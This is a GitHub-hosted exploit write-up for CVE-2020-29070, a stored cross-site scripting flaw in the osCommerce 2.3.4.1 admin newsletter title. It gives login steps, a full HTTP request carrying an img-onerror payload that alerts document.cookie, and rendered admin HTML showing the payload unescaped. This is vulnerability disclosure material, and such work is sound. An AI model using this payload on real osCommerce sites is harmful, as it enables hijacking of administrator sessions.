Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
cve-2020-29070/CVE-2020-29070
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
110 lines (101 sloc)
7 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Exploit Title: osCommerce 2.3.4.1 - Authenticated Persistent Cross-Site Scripting | |
| # Date: 2020-11-19 | |
| # Exploit Author: Emre Aslan | |
| # Vendor Homepage: https://www.oscommerce.com/ | |
| # Version: 2.3.4.1 | |
| # Tested on: Windows & XAMPP | |
| ==> Tutorial <== | |
| 1- Login to admin panel. | |
| 2- Go to the following url. ==> http(s)://(HOST)/catalog/admin/newsletters.php?action=new | |
| 3- Enter the XSS payload into the title section and save it. | |
| ==> HTTP Request <== | |
| POST /catalog/admin/newsletters.php?action=insert HTTP/1.1 | |
| Host: (HOST) | |
| Connection: keep-alive | |
| Content-Length: 123 | |
| Cache-Control: max-age=0 | |
| Upgrade-Insecure-Requests: 1 | |
| Origin: http://(HOST)/ | |
| Content-Type: application/x-www-form-urlencoded | |
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 | |
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 | |
| Sec-Fetch-Site: same-origin | |
| Sec-Fetch-Mode: navigate | |
| Sec-Fetch-User: ?1 | |
| Sec-Fetch-Dest: document | |
| Referer: http://(HOST)/catalog/admin/newsletters.php?action=new | |
| Accept-Encoding: gzip, deflate, br | |
| Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 | |
| Cookie: osCAdminID=s11ou44m0vrasducn78c6sg | |
| module=newsletter&title="><img src=1 href=1 onerror="javascript:alert(document.cookie)"></img>&content=xss | |
| ==> Vulnerable Source Code <== | |
| <div id="contentText"> | |
| <table border="0" width="100%" cellspacing="0" cellpadding="2"> | |
| <tr> | |
| <td><table border="0" width="100%" cellspacing="0" cellpadding="0"> | |
| <tr> | |
| <td class="pageHeading">Newsletter Manager</td> | |
| <td class="pageHeading" align="right"><img src="images/pixel_trans.gif" border="0" alt="" width="57" height="40" /></td> | |
| </tr> | |
| </table></td> | |
| </tr> | |
| <tr> | |
| <td><table border="0" width="100%" cellspacing="0" cellpadding="0"> | |
| <tr> | |
| <td valign="top"><table border="0" width="100%" cellspacing="0" cellpadding="2"> | |
| <tr class="dataTableHeadingRow"> | |
| <td class="dataTableHeadingContent">Newsletters</td> | |
| <td class="dataTableHeadingContent" align="right">Size</td> | |
| <td class="dataTableHeadingContent" align="right">Module</td> | |
| <td class="dataTableHeadingContent" align="center">Sent</td> | |
| <td class="dataTableHeadingContent" align="center">Status</td> | |
| <td class="dataTableHeadingContent" align="right">Action </td> | |
| </tr> | |
| <tr id="defaultSelected" class="dataTableRowSelected" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=2&action=preview'"> | |
| <td class="dataTableContent"><a href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=2&action=preview"><img src="images/icons/preview.gif" border="0" alt="Preview" title="Preview" /></a> "><img src=1 href=1 onerror="javascript:alert(document.cookie)"></img></td> | |
| <td class="dataTableContent" align="right">3 bytes</td> | |
| <td class="dataTableContent" align="right">newsletter</td> | |
| <td class="dataTableContent" align="center"><img src="images/icons/cross.gif" border="0" alt="False" title="False" /></td> | |
| <td class="dataTableContent" align="center"><img src="images/icons/unlocked.gif" border="0" alt="Unlocked" title="Unlocked" /></td> | |
| <td class="dataTableContent" align="right"><img src="images/icon_arrow_right.gif" border="0" alt="" /> </td> | |
| </tr> | |
| <tr class="dataTableRow" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=1'"> | |
| <td class="dataTableContent"><a href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=1&action=preview"><img src="images/icons/preview.gif" border="0" alt="Preview" title="Preview" /></a> "><img src=1 href=1 onerror="javascript:alert(1)"></img></td> | |
| <td class="dataTableContent" align="right">7 bytes</td> | |
| <td class="dataTableContent" align="right">newsletter</td> | |
| <td class="dataTableContent" align="center"><img src="images/icons/cross.gif" border="0" alt="False" title="False" /></td> | |
| <td class="dataTableContent" align="center"><img src="images/icons/unlocked.gif" border="0" alt="Unlocked" title="Unlocked" /></td> | |
| <td class="dataTableContent" align="right"><a href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=1"><img src="images/icon_info.gif" border="0" alt="Info" title="Info" /></a> </td> | |
| </tr> | |
| <tr> | |
| <td colspan="6"><table border="0" width="100%" cellspacing="0" cellpadding="2"> | |
| <tr> | |
| <td class="smallText" valign="top">Displaying <strong>1</strong> to <strong>2</strong> (of <strong>2</strong> newsletters)</td> | |
| <td class="smallText" align="right">Page 1 of 1</td> | |
| </tr> | |
| <tr> | |
| <td class="smallText" align="right" colspan="2"><span class="tdbLink"><a id="tdb1" href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?action=new">New Newsletter</a></span><script type="text/javascript">$("#tdb1").button({icons:{primary:"ui-icon-plus"}}).addClass("ui-priority-secondary").parent().removeClass("tdbLink");</script></td> | |
| </tr> | |
| </table></td> | |
| </tr> | |
| </table></td> | |
| <td width="25%" valign="top"> | |
| <table border="0" width="100%" cellspacing="0" cellpadding="2"> | |
| <tr class="infoBoxHeading"> | |
| <td class="infoBoxHeading"><strong>"><img src=1 href=1 onerror="javascript:alert(document.cookie)"></img></strong></td> | |
| </tr> | |
| </table> | |
| <table border="0" width="100%" cellspacing="0" cellpadding="2"> | |
| <tr> | |
| <td align="center" class="infoBoxContent"><span class="tdbLink"><a id="tdb2" href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=2&action=preview">Preview</a></span><script type="text/javascript">$("#tdb2").button({icons:{primary:"ui-icon-document"}}).addClass("ui-priority-secondary").parent().removeClass("tdbLink");</script><span class="tdbLink"><a id="tdb3" href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=2&action=lock">Lock</a></span><script type="text/javascript">$("#tdb3").button({icons:{primary:"ui-icon-locked"}}).addClass("ui-priority-secondary").parent().removeClass("tdbLink");</script></td> | |
| </tr> | |
| <tr> | |
| <td class="infoBoxContent"><br />Date Added: 11/19/2020</td> | |
| </tr> | |
| </table> | |
| </td> | |
| </tr> | |
| </table></td> | |
| </tr> | |
| </table> | |
| </div> | |